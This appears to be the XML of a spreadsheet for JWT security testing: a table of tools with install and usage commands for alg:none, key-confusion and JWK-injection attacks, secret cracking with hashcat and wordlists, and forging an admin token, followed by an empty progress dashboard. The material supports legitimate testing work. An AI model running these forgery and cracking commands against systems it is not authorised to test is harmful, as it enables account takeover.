      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>jwt_tool</t>
        </is>
      </c>
      <c r="C4" s="6" t="inlineStr">
        <is>
          <t>CLI Tool</t>
        </is>
      </c>
      <c r="D4" s="6" t="inlineStr">
        <is>
          <t>pip install jwt_tool  OR  git clone ticarpi/jwt_tool</t>
        </is>
      </c>
      <c r="E4" s="6" t="inlineStr">
        <is>
          <t>All-in-one JWT attack tool</t>
        </is>
      </c>
      <c r="F4" s="6" t="inlineStr">
        <is>
          <t>python jwt_tool.py &lt;token&gt; -X a  (alg:none)
python jwt_tool.py &lt;token&gt; -X k -pk pub.pem  (key confusion)
python jwt_tool.py &lt;token&gt; -X i  (JWK inject)
python jwt_tool.py &lt;token&gt; -C -d wordlist.txt  (crack)</t>
        </is>
      </c>
      <c r="G4" s="14" t="inlineStr">
        <is>
          <t>https://github.com/ticarpi/jwt_tool</t>
        </is>
      </c>
    </row>
    <row r="5" ht="65" customHeight="1">
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Burp Suite</t>
        </is>
      </c>
      <c r="C5" s="6" t="inlineStr">
        <is>
          <t>Proxy/Scanner</t>
        </is>
      </c>
      <c r="D5" s="6" t="inlineStr">
        <is>
          <t>Download from portswigger.net</t>
        </is>
      </c>
      <c r="E5" s="6" t="inlineStr">
        <is>
          <t>Intercept, modify, replay JWTs</t>
        </is>
      </c>
      <c r="F5" s="6" t="inlineStr">
        <is>
          <t>Use 'JSON Web Tokens' extension (BApp Store).
Decode JWT in Inspector panel.
Replace header/payload in Repeater.</t>
        </is>
      </c>
      <c r="G5" s="14" t="inlineStr">
        <is>
          <t>https://portswigger.net/burp</t>
        </is>
      </c>
    </row>
    <row r="6" ht="65" customHeight="1">
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>hashcat</t>
        </is>
      </c>
      <c r="C6" s="6" t="inlineStr">
        <is>
          <t>Password Cracker</t>
        </is>
      </c>
      <c r="D6" s="6" t="inlineStr">
        <is>
          <t>apt install hashcat  OR  hashcat.net</t>
        </is>
      </c>
      <c r="E6" s="6" t="inlineStr">
        <is>
          <t>Brute-force HS256/384/512 secrets</t>
        </is>
      </c>
      <c r="F6" s="6" t="inlineStr">
        <is>
          <t>hashcat -a 0 -m 16500 &lt;jwt_hash&gt; rockyou.txt
hashcat -a 3 -m 16500 &lt;jwt_hash&gt; ?a?a?a?a?a?a?a?a</t>
        </is>
      </c>
      <c r="G6" s="14" t="inlineStr">
        <is>
          <t>https://hashcat.net</t>
        </is>
      </c>
    </row>
    <row r="7" ht="65" customHeight="1">
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>jwt-cracker</t>
        </is>
      </c>
      <c r="C7" s="6" t="inlineStr">
        <is>
          <t>CLI Tool</t>
        </is>
      </c>
      <c r="D7" s="6" t="inlineStr">
        <is>
          <t>npm install -g jwt-cracker</t>
        </is>
      </c>
      <c r="E7" s="6" t="inlineStr">
        <is>
          <t>Dictionary attack on JWT secrets</t>
        </is>
      </c>
      <c r="F7" s="6" t="inlineStr">
        <is>
          <t>jwt-cracker &lt;token&gt; -d wordlist.txt
jwt-cracker &lt;token&gt; -a 'abcdefghijklmnopqrstuvwxyz' -l 8</t>
        </is>
      </c>
      <c r="G7" s="14" t="inlineStr">
        <is>
          <t>https://github.com/lmammino/jwt-cracker</t>
        </is>
      </c>
    </row>
    <row r="8" ht="65" customHeight="1">
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>CyberChef</t>
        </is>
      </c>
      <c r="C8" s="6" t="inlineStr">
        <is>
          <t>Web Tool</t>
        </is>
      </c>
      <c r="D8" s="6" t="inlineStr">
        <is>
          <t>No install — browser-based</t>
        </is>
      </c>
      <c r="E8" s="6" t="inlineStr">
        <is>
          <t>Decode/encode JWT, base64url</t>
        </is>
      </c>
      <c r="F8" s="6" t="inlineStr">
        <is>
          <t>Use 'From Base64' / 'To Base64' recipes.
Modify payload JSON manually.</t>
        </is>
      </c>
      <c r="G8" s="14" t="inlineStr">
        <is>
          <t>https://gchq.github.io/CyberChef</t>
        </is>
      </c>
    </row>
    <row r="9" ht="65" customHeight="1">
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>jwt.io</t>
        </is>
      </c>
      <c r="C9" s="6" t="inlineStr">
        <is>
          <t>Web Tool</t>
        </is>
      </c>
      <c r="D9" s="6" t="inlineStr">
        <is>
          <t>No install — browser-based</t>
        </is>
      </c>
      <c r="E9" s="6" t="inlineStr">
        <is>
          <t>Decode, inspect, craft JWTs</t>
        </is>
      </c>
      <c r="F9" s="6" t="inlineStr">
        <is>
          <t>Paste token to decode.
Modify claims and re-sign with known secret.</t>
        </is>
      </c>
      <c r="G9" s="14" t="inlineStr">
        <is>
          <t>https://jwt.io</t>
        </is>
      </c>
    </row>
    <row r="10" ht="65" customHeight="1">
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Postman</t>
        </is>
      </c>
      <c r="C10" s="6" t="inlineStr">
        <is>
          <t>API Client</t>
        </is>
      </c>
      <c r="D10" s="6" t="inlineStr">
        <is>
          <t>postman.com</t>
        </is>
      </c>
      <c r="E10" s="6" t="inlineStr">
        <is>
          <t>Replay and craft JWT-based API requests</t>
        </is>
      </c>
      <c r="F10" s="6" t="inlineStr">
        <is>
          <t>Set Authorization: Bearer &lt;token&gt;.
Use Pre-request scripts to auto-refresh tokens.</t>
        </is>
      </c>
      <c r="G10" s="14" t="inlineStr">
        <is>
          <t>https://www.postman.com</t>
        </is>
      </c>
    </row>
    <row r="11" ht="65" customHeight="1">
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>mitmproxy</t>
        </is>
      </c>
      <c r="C11" s="6" t="inlineStr">
        <is>
          <t>Proxy</t>
        </is>
      </c>
      <c r="D11" s="6" t="inlineStr">
        <is>
          <t>pip install mitmproxy</t>
        </is>
      </c>
      <c r="E11" s="6" t="inlineStr">
        <is>
          <t>MITM interception of JWT in transit</t>
        </is>
      </c>
      <c r="F11" s="6" t="inlineStr">
        <is>
          <t>mitmproxy -p 8080
Set browser proxy to localhost:8080.
Filter: ~h Authorization</t>
        </is>
      </c>
      <c r="G11" s="14" t="inlineStr">
        <is>
          <t>https://mitmproxy.org</t>
        </is>
      </c>
    </row>
    <row r="12" ht="65" customHeight="1">
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>truffleHog</t>
        </is>
      </c>
      <c r="C12" s="6" t="inlineStr">
        <is>
          <t>Secret Scanner</t>
        </is>
      </c>
      <c r="D12" s="6" t="inlineStr">
        <is>
          <t>pip install trufflehog</t>
        </is>
      </c>
      <c r="E12" s="6" t="inlineStr">
        <is>
          <t>Find hardcoded JWT secrets in code/repos</t>
        </is>
      </c>
      <c r="F12" s="6" t="inlineStr">
        <is>
          <t>trufflehog --regex --entropy=False git https://github.com/target/repo
trufflehog filesystem /path/to/code</t>
        </is>
      </c>
      <c r="G12" s="14" t="inlineStr">
        <is>
          <t>https://github.com/trufflesecurity/trufflehog</t>
        </is>
      </c>
    </row>
    <row r="13" ht="65" customHeight="1">
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>binwalk</t>
        </is>
      </c>
      <c r="C13" s="6" t="inlineStr">
        <is>
          <t>Firmware Analyzer</t>
        </is>
      </c>
      <c r="D13" s="6" t="inlineStr">
        <is>
          <t>apt install binwalk</t>
        </is>
      </c>
      <c r="E13" s="6" t="inlineStr">
        <is>
          <t>Extract and analyze firmware for hardcoded secrets</t>
        </is>
      </c>
      <c r="F13" s="6" t="inlineStr">
        <is>
          <t>binwalk -e firmware.bin
binwalk --dd='.*' firmware.bin
strings extracted/* | grep -i jwt</t>
        </is>
      </c>
      <c r="G13" s="14" t="inlineStr">
        <is>
          <t>https://github.com/ReFirmLabs/binwalk</t>
        </is>
      </c>
    </row>
    <row r="14" ht="65" customHeight="1">
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Ghidra</t>
        </is>
      </c>
      <c r="C14" s="6" t="inlineStr">
        <is>
          <t>Reverse Engineering</t>
        </is>
      </c>
      <c r="D14" s="6" t="inlineStr">
        <is>
          <t>ghidra-sre.org</t>
        </is>
      </c>
      <c r="E14" s="6" t="inlineStr">
        <is>
          <t>Decompile binaries to find hardcoded keys</t>
        </is>
      </c>
      <c r="F14" s="6" t="inlineStr">
        <is>
          <t>Import binary → analyze → search strings for 'secret', 'jwt', 'HS256'
Use String Search (Window &gt; Defined Strings)</t>
        </is>
      </c>
      <c r="G14" s="14" t="inlineStr">
        <is>
          <t>https://ghidra-sre.org</t>
        </is>
      </c>
    </row>
    <row r="15" ht="65" customHeight="1">
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="C15" s="6" t="inlineStr">
        <is>
          <t>CLI Tool</t>
        </is>
      </c>
      <c r="D15" s="6" t="inlineStr">
        <is>
          <t>Pre-installed on Linux/macOS</t>
        </is>
      </c>
      <c r="E15" s="6" t="inlineStr">
        <is>
          <t>Generate RSA keys for algo confusion attacks</t>
        </is>
      </c>
      <c r="F15" s="6" t="inlineStr">
        <is>
          <t>openssl genrsa -out private.pem 2048
openssl rsa -in private.pem -pubout -out public.pem</t>
        </is>
      </c>
      <c r="G15" s="14" t="inlineStr">
        <is>
          <t>Built-in</t>
        </is>
      </c>
    </row>
    <row r="16" ht="65" customHeight="1">
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>OWASP ZAP</t>
        </is>
      </c>
      <c r="C16" s="6" t="inlineStr">
        <is>
          <t>Scanner</t>
        </is>
      </c>
      <c r="D16" s="6" t="inlineStr">
        <is>
          <t>zaproxy.org</t>
        </is>
      </c>
      <c r="E16" s="6" t="inlineStr">
        <is>
          <t>Automated JWT vulnerability scanning</t>
        </is>
      </c>
      <c r="F16" s="6" t="inlineStr">
        <is>
          <t>Enable 'JWT Support' addon.
Active scan with JWT-aware rules.
Fuzz JWT header fields.</t>
        </is>
      </c>
      <c r="G16" s="14" t="inlineStr">
        <is>
          <t>https://www.zaproxy.org</t>
        </is>
      </c>
    </row>
    <row r="17" ht="65" customHeight="1">
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>JWTLens (Burp Extension)</t>
        </is>
      </c>
      <c r="C17" s="6" t="inlineStr">
        <is>
          <t>Burp Extension</t>
        </is>
      </c>
      <c r="D17" s="6" t="inlineStr">
        <is>
          <t>BApp Store → JWTLens</t>
        </is>
      </c>
      <c r="E17" s="6" t="inlineStr">
        <is>
          <t>62 automated JWT checks in Burp</t>
        </is>
      </c>
      <c r="F17" s="6" t="inlineStr">
        <is>
          <t>Install from BApp Store.
Automatically checks alg:none, weak secrets, JWK injection, and more.</t>
        </is>
      </c>
      <c r="G17" s="14" t="inlineStr">
        <is>
          <t>https://jwtlens.netlify.app</t>
        </is>
      </c>
    </row>
    <row r="18" ht="65" customHeight="1">
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Python + PyJWT / python-jose</t>
        </is>
      </c>
      <c r="C18" s="6" t="inlineStr">
        <is>
          <t>Scripting</t>
        </is>
      </c>
      <c r="D18" s="6" t="inlineStr">
        <is>
          <t>pip install PyJWT python-jose</t>
        </is>
      </c>
      <c r="E18" s="6" t="inlineStr">
        <is>
          <t>Custom JWT crafting and attack automation</t>
        </is>
      </c>
      <c r="F18" s="6" t="inlineStr">
        <is>
          <t>import jwt
jwt.encode({'role':'admin'}, 'secret', algorithm='HS256')
jwt.decode(token, key, algorithms=['HS256'])</t>
        </is>
      </c>
      <c r="G18" s="14" t="inlineStr">
        <is>
          <t>https://pyjwt.readthedocs.io</t>
        </is>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="B1:G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BF360C"/>
    <outlinePr summaryBelow="1" summaryRight="1"/>
    <pageSetUpPr/>
  </sheetPr>
  <dimension ref="B1:H15"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <cols>
    <col width="3" customWidth="1" min="1" max="1"/>
    <col width="28" customWidth="1" min="2" max="2"/>
    <col width="14" customWidth="1" min="3" max="3"/>
    <col width="12" customWidth="1" min="4" max="4"/>
    <col width="18" customWidth="1" min="5" max="5"/>
    <col width="16" customWidth="1" min="6" max="6"/>
    <col width="16" customWidth="1" min="7" max="7"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>JWT Testing Progress Dashboard</t>
        </is>
      </c>
    </row>
    <row r="2" ht="20" customHeight="1">
      <c r="B2" s="15" t="inlineStr">
        <is>
          <t>Update 'Tested?' column in JWT Checklist sheet — this dashboard auto-reflects counts.</t>
        </is>
      </c>
    </row>
    <row r="4" ht="24" customHeight="1">
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>Category</t>
        </is>
      </c>
      <c r="C4" s="3" t="inlineStr">
        <is>
          <t>Total Vulns</t>
        </is>
      </c>
      <c r="D4" s="3" t="inlineStr">
        <is>
          <t>Tested</t>
        </is>
      </c>
      <c r="E4" s="3" t="inlineStr">
        <is>
          <t>Vulnerable Found</t>
        </is>
      </c>
      <c r="F4" s="3" t="inlineStr">
        <is>
          <t>Not Applicable</t>
        </is>
      </c>
      <c r="G4" s="3" t="inlineStr">
        <is>
          <t>Completion %</t>
        </is>
      </c>
    </row>
    <row r="5" ht="20" customHeight="1">
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="C5" s="8" t="n">
        <v>6</v>
      </c>
      <c r="D5" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E5" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F5" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G5" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="6" ht="20" customHeight="1">
      <c r="B6" s="4" t="inlineStr">
        <is>
          <t>Key Injection &amp; Header</t>
        </is>
      </c>
      <c r="C6" s="8" t="n">
        <v>5</v>
      </c>
      <c r="D6" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E6" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F6" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G6" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="7" ht="20" customHeight="1">
      <c r="B7" s="4" t="inlineStr">
        <is>
          <t>Weak Secrets &amp; Keys</t>
        </is>
      </c>
      <c r="C7" s="8" t="n">
        <v>4</v>
      </c>
      <c r="D7" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E7" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F7" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G7" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="8" ht="20" customHeight="1">
      <c r="B8" s="4" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="C8" s="8" t="n">
        <v>7</v>
      </c>
      <c r="D8" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E8" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F8" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G8" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="9" ht="20" customHeight="1">
      <c r="B9" s="4" t="inlineStr">
        <is>
          <t>Token Theft &amp; Replay</t>
        </is>
      </c>
      <c r="C9" s="8" t="n">
        <v>5</v>
      </c>
      <c r="D9" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E9" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F9" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G9" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="10" ht="20" customHeight="1">
      <c r="B10" s="4" t="inlineStr">
        <is>
          <t>Payload &amp; Structural</t>
        </is>
      </c>
      <c r="C10" s="8" t="n">
        <v>4</v>
      </c>
      <c r="D10" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E10" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F10" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G10" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="11" ht="20" customHeight="1">
      <c r="B11" s="4" t="inlineStr">
        <is>
          <t>Timing &amp; Side-Channel</t>
        </is>
      </c>
      <c r="C11" s="8" t="n">
        <v>2</v>
      </c>
      <c r="D11" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E11" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F11" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G11" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="12" ht="20" customHeight="1">
      <c r="B12" s="4" t="inlineStr">
        <is>
          <t>Misc / Logic Flaws</t>
        </is>
      </c>
      <c r="C12" s="8" t="n">
        <v>3</v>
      </c>
      <c r="D12" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E12" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F12" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G12" s="8" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="13" ht="22" customHeight="1">
      <c r="B13" s="16" t="inlineStr">
        <is>
          <t>TOTAL</t>
        </is>
      </c>
      <c r="C13" s="16" t="n">
        <v>36</v>
      </c>
      <c r="D13" s="16" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="E13" s="16" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="F13" s="16" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
      <c r="G13" s="16" t="inlineStr">
        <is>
          <t>-</t>
        </is>
      </c>
    </row>
    <row r="15" ht="14" customHeight="1">
      <c r="B15" s="17" t="inlineStr">
        <is>
          <t>Tip: Filter JWT Checklist by 'Tested?' column. Use ⚠ Vulnerable to track confirmed findings.</t>
        </is>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="B1:H1"/>
    <mergeCell ref="B2:H2"/>
    <mergeCell ref="B15:H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2026-04-15T18:50:09Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-04-15T18:50:19Z</dcterms:modified>
</cp:coreProperties>
</file>